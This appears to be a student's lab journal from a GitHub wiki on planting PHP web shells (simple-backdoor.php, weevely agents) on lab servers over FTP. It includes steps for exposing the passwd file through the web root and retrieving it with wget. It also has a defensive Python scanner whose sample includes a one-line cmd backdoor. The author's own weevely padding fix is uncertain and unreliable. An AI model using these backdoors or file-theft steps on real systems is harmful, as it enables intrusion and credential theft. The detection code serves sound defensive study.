Weevely Webshells - 5huckle/OFFICIALTECHJOURNAL GitHub Wiki
Webshells
How to do it
- Upload backdoor to desired webserver
Use FTP to connect to desired web server via ip address
ftp 10.0.5.25
Note: If the server allows anonymous login, the username is 'anonymous' and the password is left blank
Use put / mput to upload your file to the server
put /usr/share/webshells/php/simple-backdoor.php
NOTE: I wrote this before completing the prior lab that gave us webshells to use, so I do not actually have the correct code for uploading this specific script; however, the syntax is the same.
This uploads your backdoor to the webserver
Weevely
What is it?
Weevely is a stealth PHP web shell that simulates a telnet-like connection. It is an essential tool for web application post-exploitation, and can be used as a stealth backdoor or as a web shell to manage legitimate web accounts, even free-hosted ones.
How to use
- First, generate a file
weevely generate password /home/champuser/file.txt
This generates a PHP agent script, using 'password' as its password, saved as the new file file.txt in /home/champuser/
- Push this script to the web server
ftp 10.0.5.25
put /home/champuser/System42.php
- Access the backdoor by using weevely and specifying the location on the target server
- Run commands to initiate the session
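As an added defender-side counterpart to the upload steps above (example code written for this page, not code from this journal or from weevely), the following Python scanner walks a web root such as /var/www/html and flags PHP files where request parameters reach a command-execution sink, the pattern of a cmd-style backdoor like simple-backdoor.php. The signature set and the sample files are constructed for the example; obfuscated agents are only weakly flagged, via their decoder calls.

```python
import re
import tempfile
from pathlib import Path

# Signatures a classic PHP web shell combines: request input reaching a
# command/code execution sink. Constructed for this example, not from any scanner.
SINK_RE = re.compile(r"\b(system|exec|shell_exec|passthru|popen|proc_open|eval|assert)\s*\(", re.I)
INPUT_RE = re.compile(r"\$_(GET|POST|REQUEST|COOKIE|SERVER)\b")
DECODER_RE = re.compile(r"\b(base64_decode|gzinflate|str_rot13)\s*\(", re.I)

def score_php_source(src: str) -> int:
    """Suspicion score for PHP source; >= 3 means request input reaches an exec sink."""
    score = 0
    if SINK_RE.search(src):
        score += 2
    if INPUT_RE.search(src) and SINK_RE.search(src):
        score += 3  # request data feeding an execution sink is the web-shell signature
    if DECODER_RE.search(src):
        score += 1  # weak on its own; obfuscated agents lean on decoders
    return score

def scan_webroot(root: str, threshold: int = 3) -> list:
    """Return [(path, score)] for PHP files under root scoring at or above threshold."""
    hits = []
    for path in Path(root).rglob("*"):
        if path.suffix.lower() not in {".php", ".phtml", ".php5"} or not path.is_file():
            continue
        score = score_php_source(path.read_text(encoding="utf-8", errors="replace"))
        if score >= threshold:
            hits.append((str(path), score))
    return sorted(hits, key=lambda h: -h[1])

# Constructed sample web root: a benign page and a minimal cmd-parameter
# backdoor of the kind the journal uploads (written for this example, not copied).
SAMPLE_FILES = {
    "index.php": "<?php echo 'Hello, ' . htmlspecialchars($_GET['name'] ?? 'world'); ?>",
    "uploads/sb.php": "<?php if(isset($_REQUEST['cmd'])){ system($_REQUEST['cmd']); } ?>",
}

def build_sample_root() -> str:
    # Materialise SAMPLE_FILES in a temporary directory and return its path.
    root = Path(tempfile.mkdtemp(prefix="webroot_"))
    for rel, body in SAMPLE_FILES.items():
        target = root / rel
        target.parent.mkdir(parents=True, exist_ok=True)
        target.write_text(body)
    return str(root)

if __name__ == "__main__":
    for path, score in scan_webroot(build_sample_root()):
        print(f"{score}\t{path}")
```

Run it against a real web root by passing that directory to scan_webroot; pairing the hits with file modification times and the FTP user's write permissions narrows them to recent uploads.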
Troubleshooting
My first attempt will be to use scp to transfer simple-backdoor.php to the /var/www/html directory on 10.0.5.21 under an admin account and hope that it deploys it.
scp simple-backdoor.php <admin-user>@10.0.5.21:/var/www/html
UPDATE: This did not work as I do not have the sufficient privileges on the target box.
I will try the python3 server now because why not.
UPDATE: I did not end up using the python3 server; instead, I ended up using my ssh access to access peregrin.took and move the desired files around where I wanted. Then I used wget to extract them from the webserver. I do not understand how to execute a web shell yet, so this was my alternative. This worked.
- Using wget from hostbox, target the desired file
wget http://10.0.5.21/passwd (I moved the passwd file into /var/www/html to be able to do this)
For everything above, I was doing it on the wrong server. I am unable to use these techniques for the correct server.
Another issue I was having was being unable to upload files to the target server due to a passive mode glitch. The fix was mput instead of put, which worked for some reason.
UPDATE: This did not work in the end; it was not a long-term fix. I do not know what the cause of mput working was, but it only worked once, which is all I needed.
Another issue I was having was with weevely itself. It gave me an error involving padding. I potentially ended up fixing it by adding
base64.b64decode(s + b'==')
to the end of the PHP file generated. However, I'm not too sure if this was the right fix, or if it was the new file I created on my second attempt that just ended up working without any issues.